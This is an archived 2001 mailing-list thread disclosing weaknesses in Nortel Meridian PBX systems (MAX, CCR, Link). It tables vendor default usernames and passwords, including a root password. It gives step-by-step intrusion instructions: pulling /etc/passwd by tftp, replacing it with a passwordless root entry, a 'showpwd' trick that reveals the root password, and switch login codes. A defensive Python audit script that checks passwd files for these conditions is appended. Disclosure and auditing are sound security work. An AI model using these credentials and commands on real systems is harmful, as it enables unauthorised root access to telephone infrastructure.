In article <01063012540504.01490@sliver>, H D Moore <hdmat_private> writes

I came across this while doing a security review 3 years ago. I tried to contact Nortel several times but never received a response. I guess they don't think it is important :-o

>If the PBX is hooked into the actual network, there are quite a few ways to
>get access to the system. The easiest method is to tftp the /etc/passwd file
>off the system and crack the hashes. If you go this route, you will get a
>user account called "service" with a password of "smile" ;) If you log into
>the system with this account, you will notice that /etc is mode 0777, so
>getting root access is trivial:
>
>$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
>$ mv /etc/passwd /etc/passwd.bak
>$ mv /etc/mah_passwd /etc/passwd
>$ su root
># mv /etc/passwd.bak /etc/passwd
>
>I don't remember which version of this system it was, but the client software
>that came with it was called "Meridian Terminal Emulator". You could manage
>the PBX with this by first logging in with 0000/0000 then giving it the
>manager password of "9999". I really wish I had more time to write up the
>stuff I find out there...
>
>-HD
>

Anyway I think the service account exists on the MAX, CCR and Link Meridian components. Here is some other stuff I came across,

Accounts that give UNIX level access
====================================
Box             Account     Password    Use
MAX,CCR,Link    service     smile       General engineer account
CCR,Link        disttech    4tas        Engineer account
MAX             root        3ep5w2u     Root

Accounts that give application level access
===========================================
Box             Account     Password    Use
MAX             maint       ntacdmax    Maintenance account
CCR, Link       maint       maint       Maintenance account
CCR             ccrusr      ccrusr      User account
Link            mlusr       mlusr       User account

To gain root access on Link or CCR -

Login as disttech/4tas
type "showpwd" at prompt
enter first 3 letters from Yesterday and first 3 from Tomorrow (e.g. if today is Tuesday enter "MonWed" - note the capitalisation).
When you are told this is invalid, enter the same thing again.
The root password is now displayed in plain text on the screen.
You can now "su" to root with this password.

To gain access to the Meridian itself - there are two methods of access depending how the switch is set up. Try password only first as most will probably be set up like this -

Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintenance)

Username and password
logi customer
PASS? 0000
logi admin1
PASS? 1111
logi to
PASS? 8429

Hope this helps,

Mark.
--
Mark Rowe
IT Security Consultant
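An audit check for the conditions described in this thread, added here as an example and not part of either post: it flags passwd entries with an empty password field, uid 0 on a non-root name, or one of the vendor account names listed above, and reports a directory that any local user can rename files in (world-writable, no sticky bit). The function names and the sample entries other than the quoted root line are assumptions made for the example.

```python
import os
import stat

# Account names the post lists as shipping with known passwords (root excluded:
# it exists everywhere, so its presence alone says nothing).
VENDOR_ACCOUNTS = {"service", "disttech", "maint", "ccrusr", "mlusr"}


def audit_passwd(text):
    """Return sorted (account, issue) pairs for a passwd-format string."""
    findings = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            findings.add((fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.add((name, "empty password field"))
        if uid == "0" and name != "root":
            findings.add((name, "uid 0 on non-root account"))
        if name in VENDOR_ACCOUNTS:
            findings.add((name, "vendor default account present"))
    return sorted(findings)


def dir_replaceable_by_anyone(path):
    """True if any local user can rename or replace files in the directory:
    world-writable and no sticky bit, as with the mode 0777 /etc in the post."""
    mode = os.stat(path).st_mode
    return bool(mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX)


# Constructed sample: the passwordless root line is the one quoted in the post;
# the other entries are made up for the example.
SAMPLE = """\
root::0:0:root:/root:/bin/sh
service:x:100:100:engineer:/home/service:/bin/sh
operator:x:0:0:ops:/home/operator:/bin/sh
daemon:x:1:1:daemon:/:/bin/false
"""

if __name__ == "__main__":
    for account, issue in audit_passwd(SAMPLE):
        print(f"{account}: {issue}")
    print("/etc replaceable by any user:", dir_replaceable_by_anyone("/etc"))
```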
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 07:46:04 PDT